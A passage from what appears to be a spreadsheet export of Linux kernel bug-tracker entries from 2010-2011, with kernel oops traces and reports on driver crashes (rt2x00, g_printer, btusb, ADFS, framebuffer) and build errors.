00000000 ECX: f6927200 EDX: f6978a80 Dec 26 04:35:32 vger kernel: ESI: f6927200 EDI: 00000001 EBP: d55b1db4 ESP: d55b1da0 Dec 26 04:35:32 vger kernel: DS: 007b ES: 007b FS: 0000 GS: 00e0 SS: 0068 Dec 26 04:35:32 vger kernel: Process wpa_supplicant (pid: 1896, ti=d55b0000 task=f6912000 task.ti=d55b0000) Dec 26 04:35:32 vger kernel: Stack: Dec 26 04:35:32 vger kernel: f6978a80 f6927234 f6978a80 00000000 f6978260 d55b1dc4 f874de1f f6978a80 Dec 26 04:35:32 vger kernel: &lt;0&gt; 00000000 d55b1dd4 f874def4 f6929800 f6978854 d55b1ddc f874e73f d55b1e14 Dec 26 04:35:32 vger kernel: &lt;0&gt; f8678e8e f868db40 00000002 f6929b80 f6978260 00000002 d55b1e14 00000000 Dec 26 04:35:32 vger kernel: Call Trace: Dec 26 04:35:32 vger kernel: [&lt;f874de1f&gt;] ? rt2x00lib_stop+0x6f/0xe0 [rt2x00lib] Dec 26 04:35:32 vger kernel: [&lt;f874def4&gt;] ? rt2x00lib_start+0x64/0xd0 [rt2x00lib] Dec 26 04:35:32 vger kernel: [&lt;f874e73f&gt;] ? rt2x00mac_start+0x1f/0x30 [rt2x00lib] Dec 26 04:35:32 vger kernel: [&lt;f8678e8e&gt;] ? ieee80211_open+0x37e/0x790 [mac80211] Dec 26 04:35:32 vger kernel: [&lt;c132fafb&gt;] ? __dev_open+0xab/0x100 Dec 26 04:35:32 vger kernel: [&lt;c132dd9d&gt;] ? __dev_change_flags+0x7d/0x150 Dec 26 04:35:32 vger kernel: [&lt;c13303bd&gt;] ? dev_get_by_name_rcu+0x7d/0xa0 Dec 26 04:35:32 vger kernel: [&lt;c132fa0e&gt;] ? dev_change_flags+0x1e/0x60 Dec 26 04:35:32 vger kernel: [&lt;c138bbe7&gt;] ? devinet_ioctl+0x6e7/0x780 Dec 26 04:35:32 vger kernel: [&lt;c1331281&gt;] ? dev_ioctl+0x2a1/0x6c0 Dec 26 04:35:32 vger kernel: [&lt;c138cd3d&gt;] ? inet_ioctl+0x8d/0xb0 Dec 26 04:35:32 vger kernel: [&lt;c131da78&gt;] ? sock_ioctl+0x68/0x280 Dec 26 04:35:32 vger kernel: [&lt;c131da10&gt;] ? sock_ioctl+0x0/0x280 Dec 26 04:35:32 vger kernel: [&lt;c10c1a89&gt;] ? do_vfs_ioctl+0x79/0x5f0 Dec 26 04:35:32 vger kernel: [&lt;c1023cf0&gt;] ? do_page_fault+0x0/0x3b0 Dec 26 04:35:32 vger kernel: [&lt;c1023eb5&gt;] ? do_page_fault+0x1c5/0x3b0 Dec 26 04:35:32 vger kernel: [&lt;c131e9af&gt;] ? sock_map_fd+0x1f/0x30 Dec 26 04:35:32 vger kernel: [&lt;c1320688&gt;] ? sys_socketcall+0x288/0x2a0 Dec 26 04:35:32 vger kernel: [&lt;c10c205f&gt;] ? sys_ioctl+0x5f/0x80 Dec 26 04:35:32 vger kernel: [&lt;c100389f&gt;] ? sysenter_do_call+0x12/0x28 Dec 26 04:35:32 vger kernel: Code: 6b 82 c0 02 00 00 34 85 c0 74 64 66 90 89 f0 89 55 ec e8 8e fe ff ff 8b 55 ec 66 83 7e 18 00 74 30 31 db 31 ff 8b 46 04 83 c7 01 &lt;c7&gt; 04 18 00 00 00 00 8b 42 04 8b 48 2c 8b 46 04 89 55 ec 01 d8 Dec 26 04:35:32 vger kernel: EIP: [&lt;f874f306&gt;] rt2x00queue_init_queues+0x46/0xa0 [rt2x00lib] SS:ESP 0068:d55b1da0 Dec 26 04:35:32 vger kernel: CR2: 0000000000000000 Dec 26 04:35:32 vger kernel: ---[ end trace c515172bfd54bf6e ]--- Dec 26 04:37:50 vger kernel: BUG: unable to handle kernel NULL pointer dereference at 00000010 Dec 26 04:37:50 vger kernel: IP: [&lt;f877844c&gt;] rt2x00pci_free_queue_dma+0xc/0xb0 [rt2x00pci] Dec 26 04:37:50 vger kernel: *pde = 00000000 Dec 26 04:37:50 vger kernel: Oops: 0000 [#2] PREEMPT Dec 26 04:37:50 vger kernel: last sysfs file: /sys/devices/virtual/backlight/acpi_video0/brightness Dec 26 04:37:50 vger kernel: Modules linked in: usb_storage ipheth aes_i586 aes_generic irnet ppp_generic slhc irtty_sir sir_dev ircomm_tty ircomm vboxnetadp vboxnetflt vboxdrv ipv6 mperf nf_conntrack_netbios_ns ipt_LOG vfat fat fuse uinput snd_intel8x0m snd_intel8x0 snd_ac97_codec arc4 ecb ac97_bus rt2800pci(-) snd_seq rt2800lib rt2x00pci snd_seq_device rt2x00lib sis900 snd_pcm ppdev mac80211 video snd_timer mii snd soundcore cfg80211 parport_pc eeprom_93cx6 parport irda k8temp snd_page_alloc pcspkr joydev serio_raw crc_ccitt output i2c_sis96x sata_sil ata_generic firewire_ohci pata_acpi firewire_core yenta_socket pata_sis crc_itu_t radeon ttm drm_kms_helper drm fb fbdev hwmon i2c_algo_bit cfbcopyarea cfbimgblt cfbfillrect [last unloaded: scsi_wait_scan] Dec 26 04:37:50 vger kernel: Dec 26 04:37:50 vger kernel: Pid: 1903, comm: rmmod Tainted: G D 2.6.36.2-1.fc13.i686 #4 / Dec 26 04:37:50 vger kernel: EIP: 0060:[&lt;f877844c&gt;] EFLAGS: 00010286 CPU: 0 Dec 26 04:37:50 vger kernel: EIP is at rt2x00pci_free_queue_dma+0xc/0xb0 [rt2x00pci] Dec 26 04:37:50 vger kernel: EAX: f6978a80 EBX: f6978a80 ECX: 00000000 EDX: f6927200 Dec 26 04:37:50 vger kernel: ESI: f6927234 EDI: f6978260 EBP: f7137e78 ESP: f7137e5c Dec 26 04:37:50 vger kernel: DS: 007b ES: 007b FS: 0000 GS: 00e0 SS: 0068 Dec 26 04:37:50 vger kernel: Process rmmod (pid: 1903, ti=f7136000 task=f6913a40 task.ti=f7136000) Dec 26 04:37:50 vger kernel: Stack: Dec 26 04:37:50 vger kernel: 00000013 f6978a80 f7137e78 c10716b8 f6978a80 f6927234 f6978260 f7137e88 Dec 26 04:37:50 vger kernel: &lt;0&gt; f8778527 f6978a80 f70d0060 f7137e94 f874d04a f6978a80 f7137ea0 f874d8e4 Dec 26 04:37:50 vger kernel: &lt;0&gt; f70d0000 f7137eb8 f877816a f6978a80 f70d0060 f70d0000 f70d0108 f7137ed8 Dec 26 04:37:50 vger kernel: Call Trace: Dec 26 04:37:50 vger kernel: [&lt;c10716b8&gt;] ? free_irq+0x38/0x70 Dec 26 04:37:50 vger kernel: [&lt;f8778527&gt;] ? rt2x00pci_uninitialize+0x37/0x60 [rt2x00pci] Dec 26 04:37:50 vger kernel: [&lt;f874d04a&gt;] ? rt2x00lib_uninitialize+0x2a/0x50 [rt2x00lib] Dec 26 04:37:50 vger kernel: [&lt;f874d8e4&gt;] ? rt2x00lib_remove_dev+0x24/0xa0 [rt2x00lib] Dec 26 04:37:50 vger kernel: [&lt;f877816a&gt;] ? rt2x00pci_remove+0x2a/0x60 [rt2x00pci] Dec 26 04:37:50 vger kernel: [&lt;c11c4cef&gt;] ? pci_device_remove+0x3f/0xf0 Dec 26 04:37:50 vger kernel: [&lt;c12463ab&gt;] ? __device_release_driver+0x4b/0xa0 Dec 26 04:37:50 vger kernel: [&lt;c124649f&gt;] ? driver_detach+0x9f/0xc0 Dec 26 04:37:50 vger kernel: [&lt;c124578b&gt;] ? bus_remove_driver+0x5b/0xa0 Dec 26 04:37:50 vger kernel: [&lt;c12469f1&gt;] ? driver_unregister+0x41/0x70 Dec 26 04:37:50 vger kernel: [&lt;c110b4ff&gt;] ? sysfs_remove_file+0xf/0x20 Dec 26 04:37:50 vger kernel: [&lt;c11c4fba&gt;] ? pci_unregister_driver+0x2a/0x90 Dec 26 04:37:50 vger kernel: [&lt;f87ec0b1&gt;] ? rt2800pci_exit+0xd/0xf [rt2800pci] Dec 26 04:37:50 vger kernel: [&lt;c105c6f9&gt;] ? sys_delete_module+0x1b9/0x220 Dec 26 04:37:50 vger kernel: [&lt;c109a0d2&gt;] ? do_munmap+0x202/0x2e0 Dec 26 04:37:50 vger kernel: [&lt;c100389f&gt;] ? sysenter_do_call+0x12/0x28 Dec 26 04:37:50 vger kernel: Code: 08 e5 8b 77 f8 c7 44 24 04 ee 88 77 f8 c7 04 24 24 89 77 f8 e8 3f 75 c5 c8 e9 9b fe ff ff 90 55 89 e5 57 56 53 83 ec 10 8b 4a 04 &lt;8b&gt; 59 10 8b 3b 85 ff 74 6d 8b 4b 04 89 4d e8 8b 00 0f b7 72 2e Dec 26 04:37:50 vger kernel: EIP: [&lt;f877844c&gt;] rt2x00pci_free_queue_dma+0xc/0xb0 [rt2x00pci] SS:ESP 0068:f7137e5c Dec 26 04:37:50 vger kernel: CR2: 0000000000000010 Dec 26 04:37:50 vger kernel: ---[ end trace c515172bfd54bf6f ]---</t>
  </si>
  <si>
    <t>g_printer oops on module unload</t>
  </si>
  <si>
    <t>2010-12-29 23:47 UTC</t>
  </si>
  <si>
    <t>2012-02-23 21:53 UTC</t>
  </si>
  <si>
    <t>since my webmailer screws up copy/pasted dmesg, i`m adding this to bugzilla for proper reporting and better tracking. originally reported to: To: linux-usb@vger.kernel.org Cc: dbrownell@users.sourceforge.net Date: Wed, 29 Dec 2010 21:51:13 +0100 (CET) Subject: BUG? g_printer module seems to have a problem when unloaded. i can reproduce this with 2.6.37-rc7 i think this is not expected behaviour !? modprobe g_printer modprobe -r g_printer Killed Dec 29 21:29:12 ubuntu kernel: [ 160.714195] dummy_hcd dummy_hcd: USB Host+Gadget Emulator, driver 02 May 2005 Dec 29 21:29:12 ubuntu kernel: [ 160.714418] dummy_hcd dummy_hcd: Dummy host controller Dec 29 21:29:12 ubuntu kernel: [ 160.715347] dummy_hcd dummy_hcd: new USB bus registered, assigned bus number 3 Dec 29 21:29:12 ubuntu kernel: [ 160.733118] hub 3-0:1.0: USB hub found Dec 29 21:29:12 ubuntu kernel: [ 160.733702] hub 3-0:1.0: 1 port detected Dec 29 21:29:12 ubuntu kernel: [ 160.790890] Printer Gadget: Printer Gadget, version: 2007 OCT 06 Dec 29 21:29:12 ubuntu kernel: [ 160.790918] Printer Gadget: using dummy_udc, OUT ep-b IN ep-a Dec 29 21:29:12 ubuntu kernel: [ 161.045647] usb 3-1: new high speed USB device using dummy_hcd and address 2 Dec 29 21:29:12 ubuntu kernel: [ 161.217955] Printer Gadget: high speed config #1: 2 mA, Printer Gadget Dec 29 21:29:12 ubuntu kernel: [ 161.276752] Printer Gadget: Using interface 0 Dec 29 21:29:12 ubuntu kernel: [ 161.283080] usblp0: USB Bidirectional printer dev 2 if 0 alt 0 proto 2 vid 0x0525 pid 0xA4A8 Dec 29 21:29:12 ubuntu kernel: [ 161.288866] usbcore: registered new interface driver usblp Dec 29 21:29:22 ubuntu kernel: [ 170.997443] *pde = 00000000 Dec 29 21:29:22 ubuntu kernel: [ 170.998225] Modules linked in: usblp g_printer(-) dummy_hcd snd_ens1371 gameport snd_rawmidi snd_seq_device snd_ac97_codec ac97_bus snd_pcm snd_timer psmouse snd ppdev intel_agp vmw_balloon intel_gtt soundcore lp serio_raw parport_pc snd_page_alloc shpchp agpgart parport i2c_piix4 mptspi mptscsih mptbase pcnet32 scsi_transport_spi floppy mii Dec 29 21:29:22 ubuntu kernel: [ 170.999574] Dec 29 21:29:22 ubuntu kernel: [ 170.999783] Pid: 934, comm: modprobe Not tainted 2.6.37-rc7 #3 440BX Desktop Reference Platform/VMware Virtual Platform Dec 29 21:29:22 ubuntu kernel: [ 171.000049] EIP: 0060:[ ] EFLAGS: 00010286 CPU: 0 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] EIP is at sysfs_delete_link+0x30/0x70 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] EAX: d97d86c0 EBX: de69848c ECX: d97d3240 EDX: 00000000 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] ESI: de686808 EDI: d97d3240 EBP: d9009ec0 ESP: d9009eb4 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] de686808 de686800 00000000 d9009ed0 c0406d6a de686800 de7a3b40 d9009ee4 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] c0407027 de686800 e0a4ce80 d977958c d9009ef0 c0407150 de686800 d9009f04 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] c0407192 c04062e0 0fb00000 e0a4d620 d9009f1c e0a4b5ad d97795a8 d9779104 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? device_remove_class_symlinks+0x5a/0x70 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? device_del+0x67/0x180 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? device_unregister+0x10/0x20 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? device_destroy+0x32/0x40 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? __match_devt+0x0/0x20 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? printer_unbind+0x2d/0x160 [g_printer] Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? usb_gadget_unregister_driver+0x85/0xd0 [dummy_hcd] Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? cleanup+0x38/0x60 [g_printer] Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? sys_delete_module+0x13d/0x200 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? do_munmap+0x212/0x300 Dec 29 21:29:22 ubuntu kernel: [ 171.000049] [ ] ? sysenter_do_call+0x12/0x28 Dec 29 21:29:22 ubuntu kernel: [ 171.023458] ---[ end trace 89b9a43c50cc3200 ]---</t>
  </si>
  <si>
    <t>Missing -I for Documentation/networking/ifenslave.c</t>
  </si>
  <si>
    <t>2.6.34.7</t>
  </si>
  <si>
    <t>2010-12-30 07:52 UTC</t>
  </si>
  <si>
    <t>Alexey Salmin</t>
  </si>
  <si>
    <t>2011-02-20 00:10 UTC</t>
  </si>
  <si>
    <t>Trying to build a 2.6.34.7 kernel with allyesconfig (I'm not crazy, I was testing a compiler) I've encountered the following problem: gcc -Wp,-MD,Documentation/networking/.ifenslave.d -w -O3 -fomit-frame-pointer -o Documentation/networking/ifenslave Documentation/networking/ifenslave.c Documentation/networking/ifenslave.c: In function ‘get_drv_info’: Documentation/networking/ifenslave.c:617: error: ‘BOND_ABI_VERSION’ undeclared (first use in this function) Documentation/networking/ifenslave.c:617: error: (Each undeclared identifier is reported only once For some reason -I for kernel include directory was missing. Adding HOSTCFLAGS_ifenslave.o += -I$(objtree)/usr/include to Documentation/networking/Makefile solved the problem. PS I've no freaking idea what this ifenslave is about, I just thought I should report that.</t>
  </si>
  <si>
    <t>IdeaPad Y530 brightness keys not functioning</t>
  </si>
  <si>
    <t>2010-12-30 12:48 UTC</t>
  </si>
  <si>
    <t>Tomasz</t>
  </si>
  <si>
    <t>After increasing/decreasing brightness by "Fn+Up/Down" it changes by some value and after that keys are not responding (not making any change). Modifying brighntness value by: echo 0 &gt; /sys/class/backlight/acpi_video0/brightness works good. Latest kernel that I tried where the issue no occurs was 2.6.36.2.</t>
  </si>
  <si>
    <t>ADFS filesystem E+/F+ disc handling for directories larger than 2048 bytes crashes kernel</t>
  </si>
  <si>
    <t>2.6.36.2, 2.36.7</t>
  </si>
  <si>
    <t>2011-01-04 15:40 UTC</t>
  </si>
  <si>
    <t>Stuart Swales</t>
  </si>
  <si>
    <t>Kernel crashes in fs/adfs module when accessing directories with a large number of objects on mounted Acorn ADFS E+/F+ format discs (or images) as the current code writes off the end of the fixed array of struct buffer_head pointers. Additionally, each directory access that didn't crash would leak a buffer as nr_buffers was not adjusted correctly (always left as one less than required). The attached patch fixes this by allocating a dynamically-sized set of struct buffer_head pointers if necessary for the E+/F+ case (many directories still do in fact fit in 2048 bytes) and sets the correct nr_buffers so that all buffers are released. The patch also supplies warnings on malformed directory head/tail structures. Tested by tar'ing the contents of my RISC PC's E+ format 20Gb HDD which contains a number of large directories that previously crashed the kernel.</t>
  </si>
  <si>
    <t>[BUG] implicit declaration of kfree/kzalloc in i2c-i801.c on Alpha</t>
  </si>
  <si>
    <t>2011-01-04 21:09 UTC</t>
  </si>
  <si>
    <t>2011-01-29 21:46 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] implicit declaration of kfree/kzalloc in i2c-i801.c on Alpha Submitter : Bob Tracy &lt;rct@gherkin.frus.com&gt; Date : 2011-01-04 6:18 Message-ID : 20110104061821.GA25886@gherkin.frus.com References : http://marc.info/?l=linux-kernel&amp;m=129412191720171&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>btusb hangs after resetting USB device</t>
  </si>
  <si>
    <t>2011-01-05 23:55 UTC</t>
  </si>
  <si>
    <t>denk</t>
  </si>
  <si>
    <t>2011-02-25 10:07 UTC</t>
  </si>
  <si>
    <t>Since I updated to 2.6.37 I can't use my bluetooth input devices anymore. After booting up, they work until I don't touch them for some seconds. When I want to use them again they don't work and in dmesg I can read the following: btusb 5-1:1.0: no reset_resume for driver btusb? [ 1250.747352] btusb 5-1:1.1: no reset_resume for driver btusb? Only once I got the following trace: [ 4421.829246] ------------[ cut here ]------------ [ 4421.829262] WARNING: at /tmp/buildd/linux-aptosid-2.6-2.6.37/debian/build/source_i386_none/fs/sysfs/dir.c:451 sysfs_add_one+0x96/0xc0() [ 4421.829268] Hardware name: 200763G [ 4421.829272] sysfs: cannot create duplicate filename '/class/bluetooth/hci0:11' [ 4421.829276] Modules linked in: btrfs zlib_deflate crc32c libcrc32c qnx4 hfsplus hfs minix ntfs vfat msdos fat jfs xfs ext4 jbd2 ext3 jbd ext2 mbcache dm_mod hidp hid vboxnetadp vboxnetflt vboxdrv af_packet acpi_cpufreq mperf cpufreq_powersave cpufreq_stats cpufreq_performance cpufreq_ondemand cpufreq_conservative freq_table ppdev lp parport sco bnep rfcomm l2cap crc16 nfsd lockd nfs_acl auth_rpcgss binfmt_misc sunrpc exportfs microcode uinput fuse coretemp arc4 ecb iwl3945 snd_hda_codec_analog radeon iwlcore snd_hda_intel pcmcia btusb ttm bluetooth snd_hda_codec snd_hwdep joydev drm_kms_helper yenta_socket snd_pcm drm mac80211 tpm_tis rtc_cmos snd_seq tpm ac pcmcia_rsrc pcmcia_core rtc_core video cfg80211 i2c_algo_bit rtc_lib i2c_i801 thinkpad_acpi i2c_core battery serio_raw snd_timer output tpm_bios rfkill nvram psmouse snd_seq_device intel_agp evdev intel_gtt snd button processor soundcore rng_core snd_page_alloc reiserfs sg sr_mod sd_mod cdrom pata_acpi crc_t10dif ata_generic ahci uhci_hcd ata_piix ehci_hcd libahci usbcore e1000e libata scsi_mod thermal nls_base [last unloaded: parport_pc] [ 4421.829469] Pid: 21822, comm: kworker/u:1 Tainted: G W 2.6.37-0.slh.1-aptosid-686 #1 [ 4421.829474] Call Trace: [ 4421.829484] [&lt;c013a938&gt;] ? warn_slowpath_common+0x78/0xb0 [ 4421.829492] [&lt;c022ae86&gt;] ? sysfs_add_one+0x96/0xc0 [ 4421.829499] [&lt;c022ae86&gt;] ? sysfs_add_one+0x96/0xc0 [ 4421.829505] [&lt;c013aa03&gt;] ? warn_slowpath_fmt+0x33/0x40 [ 4421.829512] [&lt;c022ae86&gt;] ? sysfs_add_one+0x96/0xc0 [ 4421.829520] [&lt;c022bd61&gt;] ? sysfs_do_create_link+0xf1/0x1c0 [ 4421.829527] [&lt;c022a705&gt;] ? sysfs_add_file_mode+0x55/0x90 [ 4421.829534] [&lt;c022be5f&gt;] ? sysfs_create_link+0xf/0x20 [ 4421.829544] [&lt;c0314de6&gt;] ? device_add+0x326/0x570 [ 4421.829553] [&lt;c01cfa49&gt;] ? kmem_cache_alloc+0x79/0x90 [ 4421.829561] [&lt;c0282b15&gt;] ? kvasprintf+0x45/0x60 [ 4421.829568] [&lt;c0314747&gt;] ? device_private_init+0x37/0x50 [ 4421.829589] [&lt;f8d5fcdd&gt;] ? add_conn+0x4d/0xd0 [bluetooth] [ 4421.829599] [&lt;c014f233&gt;] ? process_one_work+0x103/0x350 [ 4421.829609] [&lt;f8d5fc90&gt;] ? add_conn+0x0/0xd0 [bluetooth] [ 4421.829617] [&lt;c014f7d2&gt;] ? worker_thread+0x122/0x3c0 [ 4421.829624] [&lt;c014f6b0&gt;] ? worker_thread+0x0/0x3c0 [ 4421.829631] [&lt;c01529f4&gt;] ? kthread+0x74/0x80 [ 4421.829638] [&lt;c0152980&gt;] ? kthread+0x0/0x80 [ 4421.829645] [&lt;c0103df6&gt;] ? kernel_thread_helper+0x6/0x10 [ 4421.829651] ---[ end trace aa100ba423364fa5 ]--- [ 4421.829691] add_conn: Failed to register connection device [ 4421.914415] BUG: unable to handle kernel NULL pointer dereference at 00000021 [ 4421.914546] IP: [&lt;c022b8d1&gt;] sysfs_create_dir+0x21/0xb0 [ 4421.914634] *pde = 00000000 [ 4421.914687] Oops: 0000 [#1] PREEMPT SMP [ 4421.914775] last sysfs file: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map [ 4421.914880] Modules linked in: btrfs zlib_deflate crc32c libcrc32c qnx4 hfsplus hfs minix ntfs vfat msdos fat jfs xfs ext4 jbd2 ext3 jbd ext2 mbcache dm_mod hidp hid vboxnetadp vboxnetflt vboxdrv af_packet acpi_cpufreq mperf cpufreq_powersave cpufreq_stats cpufreq_performance cpufreq_ondemand cpufreq_conservative freq_table ppdev lp parport sco bnep rfcomm l2cap crc16 nfsd lockd nfs_acl auth_rpcgss binfmt_misc sunrpc exportfs microcode uinput fuse coretemp arc4 ecb iwl3945 snd_hda_codec_analog radeon iwlcore snd_hda_intel pcmcia btusb ttm bluetooth snd_hda_codec snd_hwdep joydev drm_kms_helper yenta_socket snd_pcm drm mac80211 tpm_tis rtc_cmos snd_seq tpm ac pcmcia_rsrc pcmcia_core rtc_core video cfg80211 i2c_algo_bit rtc_lib i2c_i801 thinkpad_acpi i2c_core battery serio_raw snd_timer output tpm_bios rfkill nvram psmouse snd_seq_device intel_agp evdev intel_gtt snd button processor soundcore rng_core snd_page_alloc reiserfs sg sr_mod sd_mod cdrom pata_acpi crc_t10dif ata_generic ahci uhci_hcd ata_piix ehci_hcd libahci usbcore e1000e libata scsi_mod thermal nls_base [last unloaded: parport_pc] [ 4421.915008] [ 4421.915008] Pid: 16419, comm: bluetoothd Tainted: G W 2.6.37-0.slh.1-aptosid-686 #1 200763G/200763G [ 4421.915008] EIP: 0060:[&lt;c022b8d1&gt;] EFLAGS: 00010246 CPU: 0 [ 4421.915008] EIP is at sysfs_create_dir+0x21/0xb0 [ 4421.915008] EAX: f3eaaeb4 EBX: f0056c5c ECX: f0056c60 EDX: f3ec6414 [ 4421.915008] ESI: 00000000 EDI: 00000000 EBP: f3eaaeb4 ESP: f2ed7cac [ 4421.915008] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 4421.915008] Process bluetoothd (pid: 16419, ti=f2ed6000 task=ef460c60 task.ti=f2ed6000) [ 4421.915008] Stack: [ 4421.915008] 00000286 000000d0 00000286 f5006d54 f0056c5c ffffffea f3eaaeac c0279728 [ 4421.915008] ed50a778 ed7d6bd0 f0056c5c f3eaaeb4 c027994e f0056c5c ffffffea f3eaaeac [ 4421.915008] f0056c5c c02799ed f2ed7d14 ffffffea f3eaaeac f0056c54 c0314b48 f0056c5c [ 4421.915008] Call Trace: [ 4421.915008] [&lt;c0279728&gt;] ? kobject_add_internal+0x88/0x1d0 [ 4421.915008] [&lt;c027994e&gt;] ? kobject_add_varg+0x1e/0x60 [ 4421.915008] [&lt;c02799ed&gt;] ? kobject_add+0x2d/0x60 [ 4421.915008] [&lt;c0314b48&gt;] ? device_add+0x88/0x570 [ 4421.915008] [&lt;c0230826&gt;] ? debugfs_create_file+0x146/0x220 [ 4421.915008] [&lt;f828ee47&gt;] ? hid_add_device+0x87/0x240 [hid] [ 4421.915008] [&lt;f82add89&gt;] ? hidp_add_connection+0x389/0x580 [hidp] [ 4421.915008] [&lt;f82aeac9&gt;] ? hidp_sock_ioctl+0x199/0x260 [hidp] [ 4421.915008] [&lt;c019cfc8&gt;] ? find_get_page+0x58/0xa0 [ 4421.915008] [&lt;c019e7a2&gt;] ? filemap_fault+0x82/0x400 [ 4421.915008] [&lt;c01d2b5b&gt;] ? __dentry_open+0x1bb/0x280 [ 4421.915008] [&lt;c012b065&gt;] ? __kunmap_atomic+0x95/0xd0 [ 4421.915008] [&lt;c012b071&gt;] ? __kunmap_atomic+0xa1/0xd0 [ 4421.915008] [&lt;c01b3a49&gt;] ? __do_fault+0x399/0x4d0 [ 4421.915008] [&lt;c01d02b9&gt;] ? __kmalloc+0xc9/0x120 [ 4421.915008] [&lt;c023f65d&gt;] ? security_sk_alloc+0xd/0x10 [ 4421.915008] [&lt;c0342063&gt;] ? sock_update_classid+0x53/0x70 [ 4421.915008] [&lt;c01cfa49&gt;] ? kmem_cache_alloc+0x79/0x90 [ 4421.915008] [&lt;c033e17f&gt;] ? sock_ioctl+0x6f/0x260 [ 4421.915008] [&lt;c033e110&gt;] ? sock_ioctl+0x0/0x260 [ 4421.915008] [&lt;c01e22cc&gt;] ? do_vfs_ioctl+0x8c/0x5e0 [ 4421.915008] [&lt;c033fc76&gt;] ? sock_alloc_file+0xa6/0x120 [ 4421.915008] [&lt;c01d261c&gt;] ? fd_install+0x2c/0x60 [ 4421.915008] [&lt;c033fd0b&gt;] ? sock_map_fd+0x1b/0x30 [ 4421.915008] [&lt;c0340a30&gt;] ? sys_socket+0x60/0x80 [ 4421.915008] [&lt;c0340ade&gt;] ? sys_socketcall+0x8e/0x2c0 [ 4421.915008] [&lt;c01e2896&gt;] ? sys_ioctl+0x76/0x90 [ 4421.915008] [&lt;c0103858&gt;] ? sysenter_do_call+0x12/0x28 [ 4421.915008] [&lt;c0410000&gt;] ? ezx_pcap_probe+0x1c4/0x305 [ 4421.915008] Code: 90 90 90 90 90 90 90 90 90 90 57 56 53 89 c3 83 ec 10 85 c0 0f 84 88 00 00 00 8b 40 0c be 40 0b 51 c0 85 c0 74 03 8b 70 18 31 ff &lt;80&gt; 7e 21 00 75 59 89 d8 e8 52 d8 04 00 85 c0 74 5e 8b 00 85 c0 [ 4421.915008] EIP: [&lt;c022b8d1&gt;] sysfs_create_dir+0x21/0xb0 SS:ESP 0068:f2ed7cac [ 4421.915008] CR2: 0000000000000021 [ 4421.933152] ---[ end trace aa100ba423364fa6 ]--- Looking at the dmesg error message I thought of the autosuspend feature for usb devices as the culprit and deactivated it completely. This solved the problem and my bluetooth devices work as they should again. But that's only a workaround as I don't want to forgo the suspend functionality. Any idea where the problem could be? My System: - ThinkPad T60 - Broadcom Bluetooth Card BCM2045B - Debian unstable (aptosid) with kernel 2.6.37 32-bit If you need further information, please ask. Regards denk</t>
  </si>
  <si>
    <t>kernel NULL pointer dereference in pxa3xx_nand_probe</t>
  </si>
  <si>
    <t>2011-01-06 10:12 UTC</t>
  </si>
  <si>
    <t>2011-02-03 18:52 UTC</t>
  </si>
  <si>
    <t>Subject : kernel NULL pointer dereference in pxa3xx_nand_probe Submitter : Sven Neumann &lt;s.neumann@raumfeld.com&gt; Date : 2011-01-05 11:43 Message-ID : 1294227801.3996.62.camel@sven References : http://marc.info/?l=linux-kernel&amp;m=129422903703756&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Multiple framebuffer oops and sysfs attribute deadlock</t>
  </si>
  <si>
    <t>2011-01-06 20:01 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:01 UTC</t>
  </si>
  <si>
    <t>Current framebuffer code has problems with remove_conflicting_framebuffers usage. It introduces possible oops cases for applications that are sitting on old framebuffer that is removed if it conflicts with new framebuffer driver being loaded. One example is bug report in the URL. plymouthd is sitting on old vesa framebuffer before i915 with modesetting is loaded. intelfb replaces vesa, but plymouthd still has file descriptor opened on vesa. When plymouthd closes the file descriptor, file-&gt;private_data which is struct fb_info of vesa is already freed/gone, so the oops happen. Also if the application calls functions which execute file_operations fb functions, kernel can oops also while unregister_framebuffer is being run, as registered_fb has no locking. Another issue, is that fb_set_suspend can deadlock the kernel, in the same case, because it calls and releases fb_info lock + console semaphore in inverse order of what is done in the rest of framebuffer code. More details follow on changelog patches I'll attach here. Also I'll provide test cases which triggers these two issues.</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel NULL pointer dereference at   (null)</t>
  </si>
  <si>
    <t>2011-01-06 20:59 UTC</t>
  </si>
  <si>
    <t>Steffen Michalke</t>
  </si>
  <si>
    <t>2011-02-12 23:12 UTC</t>
  </si>
  <si>
